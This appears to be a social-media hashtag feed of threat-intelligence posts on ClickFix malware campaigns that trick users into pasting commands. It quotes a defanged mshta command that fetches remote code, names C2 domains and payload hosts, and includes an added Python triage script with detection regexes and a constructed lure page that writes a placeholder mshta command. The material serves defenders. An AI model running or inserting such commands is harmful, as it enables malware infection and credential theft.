#clickfix

2025-12-17

⚠️ New #ClickFix malware campaign is tricking users with a fake browser “fix” prompt that leads to #DarkGate being installed via clipboard PowerShell commands. 📋

Read: hackread.com/clickfix-attack-f

#CyberSecurity #Malware #Windows #Scam #InfoSec

2025-12-16

Think parked domains are no big deal? Think again! These domains might seem benign on the surface, but our investigation into the risks of visiting parked domains might surprise you. In fact, if you were to visit a parked domain and actually see that typical park page, consider yourself lucky. Today, visits to these parked domains, which often happen accidentally, have become a source for traffic distribution systems, using a technique referred to by some as direct or zeroclick searches. In our experience this technique is much more likely to send you to threats like scams and malware. ClickFix? Sure. Results resembling what you were actually seeking? Not likely. To see what we found, check out our blog: blogs.infoblox.com/threat-inte
#InfobloxThreatIntel #dns #threatintel #threatintelligence #infosec #cybersecurity #infoblox #malicious #parking #domains #clickfix #phishing #scam

2025-12-16

Heads up on a modified #clickfix; it doesn't fire until you click the Verify block:

abuse.ch (abuse_ch@ioc.exchange)
2025-12-15

Unknown malware using WebSockets for botnet command&control, spreading through #ClickFix ⤵️

🖱️ClickFix -> 📃VBS -> ⚙️MSI

Payload delivery host:
🌐 urlhaus.abuse.ch/host/103.27.1

Malware sample 🤖:
bazaar.abuse.ch/sample/4d8e5e8

Botnet C2 domains:
📡 w2li .xyz
📡 w2socks .xyz

The same malware is also being spread by #Amadey pay-per-install (PPI):
➡️ urlhaus.abuse.ch/url/3733103/

ClickFix infection chain
AllAboutSecurity (allaboutsecurity)
2025-12-12

ClickFix attack abuses ChatGPT domain for macOS malware

Kaspersky researchers reveal how attackers distribute the dangerous AMOS infostealer via fake browser instructions.

all-about-security.de/clickfix

2025-12-11

📢 ConsentFix: a browser attack that hijacks OAuth consents via Azure CLI
📝 Source: Push Security.
📖 cyberveille: cyberveille.ch/posts/2025-12-1
🌐 source: pushsecurity.com/blog/consentf
#Azure_CLI #ClickFix #Cyberveille

2025-12-11

📢 GrayBravo: four CastleLoader clusters target multiple sectors with ClickFix phishing and redundant C2
📝 According to Insikt Group (Recorded Future), with a...
📖 cyberveille: cyberveille.ch/posts/2025-12-1
🌐 source: recordedfuture.com/research/gr
#CastleLoader #ClickFix #Cyberveille

2025-12-11

CastleLoader malware, known for ClickFix-related attacks, has been upgraded with a stealthy Python loader that helps it slip past security defenses.

Read: hackread.com/castleloader-malw

#CyberSecurity #Malware #InfoSec #CastleLoader #ClickFix

decio (decio@infosec.exchange)
2025-12-10
2025-12-09

The actor Storm-0249, previously known as an initial access broker, is fundamentally changing its approach, ReliaQuest reports. Instead of broad phishing campaigns, the group now relies on targeted, hard-to-detect techniques specifically aimed at abusing endpoint detection and response (EDR) solutions and thereby laying the groundwork for subsequent ransomware attacks.

More: maniabel.work/archiv/745

#infossec #infosecnews #ransomware #storm0249 #clickfix #BeDiS

2025-12-03

Command copied, control lost: Fake #ChatGPT Atlas Browser used in a #ClickFix attack tricking users into installing password‑stealing malware via a fake installer.

Read: hackread.com/fake-chatgpt-atla

#CyberSecurity #Phishing #Malware #ChatGPTAtlas #Infosec

gtbarry (gtbarry)
2025-12-03

Maybe don't trust every Windows Update without checking - hackers hijack images to spread dangerous malware

Hackers are increasingly using fake Windows Update screens to distribute complex malware through social engineering tactics.

ClickFix attacks convince users to execute commands in Windows by mimicking legitimate update prompts in full-screen web browser pages.

techradar.com/pro/maybe-dont-t

2025-12-03

Fake Windows update – beware of the ClickFix method

Can a verification that protects a site against bots be a trick? And what about a Windows update? Researchers from Huntress analysed malware installed using an interesting technique. We are talking about ClickFix, that is, persuading the user to paste and run a malicious command. Traditionally, pages/windows imitating verification (anti-bot protection) were used for this purpose, which we have written about...

#Aktualności #Awareness #CAPTCHA #Clickfix #Phishing #Schowek #Windows

sekurak.pl/falszywa-aktualizac

2025-11-30

🎯 Threat Intelligence
===================

Opening: Huntress documents a multi‑stage ClickFix social engineering campaign that culminates in infostealing malware delivery. The campaign evolves from simple "Human Verification" lures to more convincing fake Windows Update full‑screen prompts that instruct victims to paste and run a command via Win+R. Observed payloads include LummaC2 and Rhadamanthys.

Technical Details: The initial lure auto‑copies a command to the clipboard; a representative command observed was mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz as recorded in the report. The lure page contains an encrypted JavaScript blob (ENC) and a KEY_HEX value; the script implements a small decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) to reconstruct second‑stage JavaScript. That second stage is injected via an in‑memory Blob URL and revoked after execution. Notably, the final loader does not simply append data to files: the malware encodes the final stages directly into PNG pixel data, leveraging specific color channels to reconstruct and decrypt the payload in memory.

Attack Chain Analysis:
• Initial Access: Social engineering via ClickFix pages disguised as human verification or Windows Update screens.
• Download: Initial fetch using mshta to retrieve compressed/encoded resources from remote hosts.
• Execution: Decrypted JavaScript is injected via Blob URLs and executed in the browser context.
• Loader: Steganographic PNGs deliver encrypted payloads embedded in pixel color channels; payloads are extracted and decrypted in memory.
• Payloads: Infostealers observed include LummaC2 and Rhadamanthys.

Detection: Observable indicators include clipboard manipulation following page visit, mshta fetches to unusual hosts, presence of encrypted ENC/KEY_HEX constructs in page source, Blob URL creation and rapid revocation, and PNG payloads with nonstandard pixel encodings. Huntress highlighted the dynamic loading of encrypted JavaScript as an evasion technique aimed at defeating string‑based detections.

Mitigation: The source report does not provide specific defensive playbooks. Defensive teams should prioritize telemetry that captures mshta network fetches, suspicious Blob URL script injections, and anomalous image decoding activities on endpoints and in browsers.

References and Context: Findings attributed to Huntress; campaign timeline begins in October with observed evolution from basic robot checks to sophisticated Windows Update impersonation.

🔹 steganography #ClickFix #LummaC2 #Rhadamanthys #infostealer

🔗 Source: huntress.com/blog/clickfix-mal
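A triage helper for the lure construct this post describes, added here as an example; it is not part of the post and not Huntress's tooling. It assumes the lure stores the blob in a variable named ENC and the key in KEY_HEX, and that the pipeline is hex key -> base64 decode -> repeating-key XOR -> UTF-8, as inferred from the function names quoted above (hexToKey, b64ToUint8Array, xorDecode, uint8ToUtf8); the sample page and its placeholder second stage are constructed for the demonstration.

```python
"""Offline triage of a saved ClickFix lure page (added example, not Huntress's code).

Assumptions not taken from the report: variable names ENC and KEY_HEX, and the
decode order hex key -> base64 -> repeating-key XOR -> UTF-8 (inferred from the
function names hexToKey, b64ToUint8Array, xorDecode, uint8ToUtf8).
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Regexes for the constructs the report describes: the ENC blob and KEY_HEX key,
# Blob-URL injection and revocation, clipboard writes, and an mshta command.
ENC_RE = re.compile(r'\bENC\s*=\s*["\']([A-Za-z0-9+/=]+)["\']')
KEY_RE = re.compile(r'\bKEY_HEX\s*=\s*["\']([0-9a-fA-F]+)["\']')
INDICATOR_RES = {
    "blob_url_injection": re.compile(r"URL\.createObjectURL\s*\(\s*new\s+Blob\b"),
    "blob_url_revoked": re.compile(r"URL\.revokeObjectURL\s*\("),
    "clipboard_write": re.compile(
        r"navigator\.clipboard\.writeText|execCommand\s*\(\s*['\"]copy['\"]"),
    "mshta_command": re.compile(r"\bmshta\b", re.IGNORECASE),
}


# The four pipeline steps, named after the functions Huntress saw in the lure.
def hex_to_key(key_hex: str) -> bytes:
    return bytes.fromhex(key_hex)


def b64_to_bytes(enc: str) -> bytes:
    return base64.b64decode(enc)


def xor_decode(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR is its own inverse, so one routine encrypts and decrypts.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def bytes_to_utf8(data: bytes) -> str:
    return data.decode("utf-8", errors="replace")


def recover_stage2(page_source: str) -> Optional[str]:
    """Return the decrypted second-stage script, or None if the construct is absent."""
    enc = ENC_RE.search(page_source)
    key = KEY_RE.search(page_source)
    if not enc or not key:
        return None
    return bytes_to_utf8(xor_decode(b64_to_bytes(enc.group(1)), hex_to_key(key.group(1))))


@dataclass
class TriageResult:
    page_indicators: List[str]
    stage2: Optional[str]
    stage2_indicators: List[str]

    @property
    def suspicious(self) -> bool:
        return bool(self.page_indicators or self.stage2_indicators)


def triage_page(page_source: str) -> TriageResult:
    """Flag indicators in the saved page, then in the recovered second stage."""
    page_hits = [n for n, rx in INDICATOR_RES.items() if rx.search(page_source)]
    stage2 = recover_stage2(page_source)
    stage2_hits: List[str] = []
    if stage2 is not None:
        page_hits.append("enc_key_hex_construct")
        stage2_hits = [n for n, rx in INDICATOR_RES.items() if rx.search(stage2)]
    return TriageResult(page_hits, stage2, stage2_hits)


# Constructed sample (not a real lure): a harmless stand-in second stage that only
# writes a placeholder command to the clipboard, wrapped the way the report
# describes the lure wrapping it (ENC/KEY_HEX, Blob URL injected then revoked).
SAMPLE_KEY = bytes.fromhex("1f3a5c7e9b")
SAMPLE_STAGE2 = 'navigator.clipboard.writeText("mshta hxxp://PLACEHOLDER[.]invalid/x");'


def build_sample_page(stage2_js: str = SAMPLE_STAGE2, key: bytes = SAMPLE_KEY) -> str:
    enc = base64.b64encode(xor_decode(stage2_js.encode("utf-8"), key)).decode("ascii")
    return (
        "<html><body><div>Human Verification</div><script>\n"
        'var KEY_HEX = "' + key.hex() + '";\n'
        'var ENC = "' + enc + '";\n'
        "var src = uint8ToUtf8(xorDecode(b64ToUint8Array(ENC), hexToKey(KEY_HEX)));\n"
        "var u = URL.createObjectURL(new Blob([src], {type: 'text/javascript'}));\n"
        "var s = document.createElement('script'); s.src = u; document.head.appendChild(s);\n"
        "URL.revokeObjectURL(u);\n"
        "</script></body></html>\n"
    )


if __name__ == "__main__":
    result = triage_page(build_sample_page())
    print("page indicators:   ", result.page_indicators)
    print("stage-2 indicators:", result.stage2_indicators)
    print("recovered stage 2: ", result.stage2)
```

The point of decrypting rather than just pattern-matching the outer page is the one the post makes: the outer source carries only base64 noise, so string-based rules miss the clipboard write and the mshta command until the XOR stage is undone.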

B'ad Samurai 🐐🇺🇦 (badsamurai@infosec.exchange)
2025-11-27

Queue Windows 11 fix ClickFix in 3...2...

#windows11 #clickfix #microsoft

Microsoft: ClickFix is a top threat
Also Microsoft: Run this PowerShell to fix our vibe coding Windows 11

Screenshots of the MSFT 2025 Threat report with ClickFix at 47% of initial access.

And the latest KB to "fix" Windows 11 issues with PowerShell scripts.

2025-11-26

ClickFix operators are now using fake full-screen “Windows Update” pages to push victims into running malicious commands. Combined with steganographic loaders and in-memory execution, these campaigns continue to evolve.

What detection or user-training approach do you think works best today?

Source: helpnetsecurity.com/2025/11/25

Follow @technadu for ongoing threat-intel breakdowns and practical defense insights.

#Infosec #ThreatIntel #ClickFix #EDR #CyberHygiene #MalwareTrends #SecurityOps #WindowsSecurity #InfoStealer

Fake “Windows Update” screens fuel new wave of ClickFix attacks
2025-11-26

🧩 1️⃣ ClickFix: attacks that deceive by posing as Windows updates.

A recent report warns that the malicious technique called ClickFix, used by cybercriminals to distribute malware, has been updated.

The attack shows a fake “Windows update” screen in the browser.

If the victim follows the instructions (such as pressing certain keys), they end up running a malicious script that installs malware, without downloading any obvious file, since everything happens in memory.

The malware families installed are usually infostealers or remote access trojans, capable of stealing passwords, banking data, service credentials and more.

🔒 A fake update… or a door to stealing your data?

#Privacidad #Ciberseguridad #Malware #ClickFix

muycomputer.com/2025/11/25/asi
